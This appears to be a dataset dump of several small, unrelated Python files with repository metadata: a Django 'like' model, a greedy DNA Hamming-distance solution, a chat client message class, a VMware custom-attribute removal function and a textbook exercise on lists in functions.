63ab1110009de6bfd4179e04b5724ac59fe0bb83
|
[] |
no_license
|
sungwoni/cyber_public_sphere
|
1ec5425c3afb16d0f0b2a1fd6ad97599f5dd2885
|
da18b1cd8ce6588d1f197fa3df30ae68df8fe6f5
|
refs/heads/main
| 2023-07-23T09:33:49.648546
| 2021-08-19T01:54:48
| 2021-08-19T01:54:48
| 397,192,163
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 419
|
py
|
from django.contrib.auth.models import User
from django.db import models
# Create your models here.
from articleapp.models import Article
class LikeRecord(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='like_record')
article = models.ForeignKey(Article, on_delete=models.CASCADE, related_name='like_record')
class Meta:
unique_together = ('user', 'article')
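# Hedged usage sketch, not part of the original file: `user` and `article` are
# assumed to exist (e.g. inside a view); the unique_together constraint makes a
# second create() for the same pair raise IntegrityError, i.e. one like per user.
#
#   LikeRecord.objects.create(user=user, article=article)
#   LikeRecord.objects.filter(article=article).count()  # like count for an article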
|
[
"tjddnjs2013@gmail.com"
] |
tjddnjs2013@gmail.com
|
0ab9edfe9c90a6220e8a5bc16a7c65fa0ab9536e
|
6e6b4aff225fc068f2d87ee19b7bfb1d9a0e7607
|
/greedy/DNA(1969).py
|
1dfab44544626789f6a1215df99669d41856d154
|
[] |
no_license
|
pjok1122/baekjoon-online-judge-practice
|
cc4489c9dc2cd9dd4841fed7e0f6fa9827f7154a
|
2a9b7dd6342a255bb1e6b644082f40d6ef940290
|
refs/heads/master
| 2020-07-07T23:01:09.736034
| 2020-05-11T11:08:46
| 2020-05-11T11:08:46
| 203,498,880
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,052
|
py
|
'''
Problem: build a DNA string that minimizes the sum of Hamming Distances to the given DNA strings.
1. At each position, count the most frequent nucleotide ('character') and set that count as Max; since the most frequent character minimizes the H.D., append it to the resulting DNA (result).
2. Each time one nucleotide is fixed, the H.D. increases by N - Max.
3. Time complexity: O(N*M) ~ O(N)
'''
N,M = map(int,input().split())
dna = []
result =''
hd = 0
for i in range(N):
dna.append(input())
for i in range(M):
cnt = [0,0,0,0]
for j in range(N):
if dna[j][i] == 'A':
cnt[0] +=1
elif dna[j][i] =='C':
cnt[1] +=1
elif dna[j][i] == 'G':
cnt[2] +=1
elif dna[j][i] == 'T':
cnt[3] +=1
Max = max(cnt)
idx = cnt.index(Max)
if idx ==0:
result+='A'
elif idx==1:
result+='C'
elif idx==2:
result+='G'
elif idx==3:
result+='T'
hd += N - Max
print(result)
print(hd)
|
[
"pjok1122@naver.com"
] |
pjok1122@naver.com
|
2ddc82f3173503e7a5e90c47ea1549b0f769cc44
|
496ba1638338c2c548c612cfb4264f28bbab85e0
|
/utilities/ClientOperation.py
|
2fc6b1dfa1f4bedbf9b4cee2af964e3f5f67b3a0
|
[] |
no_license
|
CreativeeBlackWolf/chat
|
e1673e8990af1d3c3ba0f5d2c4c789b8f318fdf2
|
f3f1891fe976460093c829d54938dfeda85a5f52
|
refs/heads/main
| 2023-02-27T11:23:51.327445
| 2021-02-01T18:18:23
| 2021-02-01T18:18:23
| 335,032,459
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,125
|
py
|
import json
class ClientOperation:
def __init__(self, type, **kwargs):
self.type = type
if self.type == "messageArrived":
# both str instances, content and author of the message
self.content = kwargs["messageContent"]
self.author = kwargs["messageAuthor"]
elif self.type == "channelLeave":
pass
elif self.type == "requireUsername":
pass
elif self.type == "usersList":
self.users = kwargs["users"]
elif self.type == "channelCreateInfo":
# str instance, answer of the server (can be anything)
self.answer = kwargs["answer"]
elif self.type == "channelJoinInfo":
# str instance, channel port, can be 404 (not found) or 500 (server error)
self.port = kwargs["port"]
# str instance, channel name, can be None
self.channelName = None if self.port in ["404", "500"] else kwargs["channelName"]
elif self.type == "channelInfo":
# str instance, but can be None
self.port = kwargs["port"]
elif self.type == "channelList":
# dict instance (str actually, but dumped from dict)
# {"channelName": "port"}
self.channels = json.loads(kwargs["channels"])
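# Hedged usage sketch, not part of the original file: keyword names mirror the
# branches above; the payload values are illustrative.
if __name__ == "__main__":
    op = ClientOperation("messageArrived",
                         messageContent="hello",
                         messageAuthor="wolf")
    print(op.type, op.author, op.content)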
|
[
"creativeeblackwolf@gmail.com"
] |
creativeeblackwolf@gmail.com
|
901b04d91b82ae5953029503be57765f7213c0e2
|
f07a42f652f46106dee4749277d41c302e2b7406
|
/Data Set/bug-fixing-5/73faa376ad87004014356477048e7298d06de792-<remove_custom_def>-fix.py
|
399fefca0541ee754193ead44addaf401950bbcb
|
[] |
no_license
|
wsgan001/PyFPattern
|
e0fe06341cc5d51b3ad0fe29b84098d140ed54d1
|
cc347e32745f99c0cd95e79a18ddacc4574d7faa
|
refs/heads/main
| 2023-08-25T23:48:26.112133
| 2021-10-23T14:11:22
| 2021-10-23T14:11:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 531
|
py
|
def remove_custom_def(self, field):
changed = False
f = dict()
for x in self.custom_field_mgr:
if ((x.name == field) and (x.managedObjectType == vim.VirtualMachine)):
changed = True
if (not self.module.check_mode):
self.content.customFieldsManager.RemoveCustomFieldDef(key=x.key)
break
f[x.name] = (x.key, x.managedObjectType)
return {
'changed': changed,
'failed': False,
'custom_attribute_defs': list(f.keys()),
}
|
[
"dg1732004@smail.nju.edu.cn"
] |
dg1732004@smail.nju.edu.cn
|
25c2d35b1ad3349af246ac423d420173e50b00d2
|
9d3b8d5f45e5407f3275542cf5792fd2510abfe4
|
/Chapter8-Practice/test_8.4.1.py
|
d34f4b2acda4c2f610a12866949f272167402672
|
[] |
no_license
|
Beautyi/PythonPractice
|
375767583870d894801013b775c493bbd3c36ebc
|
9104006998a109dcab0848d5540fb963b20f5b02
|
refs/heads/master
| 2020-04-23T09:58:50.065403
| 2019-04-08T02:55:52
| 2019-04-08T02:55:52
| 171,088,504
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,544
|
py
|
#Modifying a list in a function
#First create a list containing some designs to be printed
unprinted_designs = ['iphone case', 'robot pendant', 'dodecahedron']
completed_models = []
#Simulate printing each design until none are left unprinted; move each to completed_models after printing
while unprinted_designs:
current_design = unprinted_designs.pop()
    #Simulate the process of making a 3D-printed model from the design
print("Printing model: " + current_design)
completed_models.append(current_design)
#Display the printed models
print("\nThe following models have been printed:")
for completed_model in completed_models:
print(completed_model)
#This can be split into two functions: the first handles printing the designs, the second reports which designs were printed
def print_models(unprinted_designs, completed_models):  # takes two parameters
    """Simulate printing each design until none are left unprinted; move each to completed_models after printing."""
while unprinted_designs:
current_design = unprinted_designs.pop()
        #Simulate the process of making a 3D-printed model from the design
print("Printing model: " + current_design)
completed_models.append(current_design)
def show_completed_models(completed_models):
"""显示打印好的所有模型"""
for completed_model in completed_models:
print(completed_model)
unprinted_designs = ['iphone case', 'robot pendant', 'dodecahedron']
completed_models = []
print_models(unprinted_designs, completed_models)
show_completed_models(completed_models)
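# Hedged follow-up sketch, not in the original file: passing a slice copy keeps
# the caller's list intact, the alternative this exercise usually leads into.
unprinted_designs = ['iphone case', 'robot pendant', 'dodecahedron']
completed_models = []
print_models(unprinted_designs[:], completed_models)
print(unprinted_designs)  # unchanged: the function consumed only the copy
show_completed_models(completed_models)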
|
[
"1210112866@qq.com"
] |
1210112866@qq.com
|